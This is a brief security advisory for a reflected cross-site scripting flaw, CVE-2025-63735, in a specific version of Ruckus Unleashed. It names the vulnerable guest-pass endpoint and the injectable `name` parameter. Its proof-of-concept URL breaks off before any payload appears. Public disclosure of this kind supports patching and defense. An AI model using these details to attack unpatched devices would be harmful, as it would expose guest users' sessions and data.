# CVE-2025-63735 – Reflected XSS in Ruckus Unleashed 200.13.6.1.319 ## Summary A reflected cross-site scripting (XSS) vulnerability exists in Ruckus Unleashed 200.13.6.1.319 via the `name` parameter to the captive-portal endpoint `selfguestpass/guestAccessSubmit.jsp`. ## Vendor Ruckus Wireless ## Product Controller-less Systems (RUCKUS Unleashed) ## Affected Version 200.13.6.1.319 ## Vulnerable Endpoint `/selfguestpass/guestAccessSubmit.jsp` ## Parameter `name` ## Proof of Concept `https://192.168.1.51/selfguestpass/guestAccessSubmit.jsp?cookie=null&tip=5&name=